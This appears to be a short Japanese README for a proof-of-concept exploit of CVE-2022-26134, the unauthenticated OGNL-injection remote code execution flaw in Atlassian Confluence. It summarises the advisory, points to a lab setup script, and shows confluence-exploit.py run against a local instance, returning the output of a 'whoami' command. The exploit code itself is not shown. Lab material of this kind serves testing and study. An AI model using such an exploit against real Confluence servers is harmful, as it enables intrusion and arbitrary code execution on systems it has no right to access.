
CVE-2022-26134 のエクスプロイト:OGNL インジェクションによる Confluence の認証前リモートコード実行
OGNL 界隈のもう一つのエクスプロイト
Confluence は、オーストラリアのソフトウェア企業 Atlassian によって開発された Web ベースの企業向け Wiki です。
2022 年 6 月 2 日、Atlassian は Confluence Server および Data Center アプリケーション向けのセキュリティアドバイザリを公開し、重大度が critical の未認証リモートコード実行の脆弱性を強調しました。この OGNL インジェクションの脆弱性により、未認証のユーザーが Confluence Server または Data Center インスタンス上で任意のコードを実行できます。
ラボをセットアップするには、start_conflunce.sh を実行し、こちら の指示に従ってください。
$ ./confluence-exploit.py
usage: confluence-exploit.py [-h] -u URL
confluence-exploit.py: error: the following arguments are required: -u/--url
$ ./confluence-exploit.py -u http://127.0.0.1:8090
🔗 URL: http://127.0.0.1:8090
👉 (id): whoami
confluence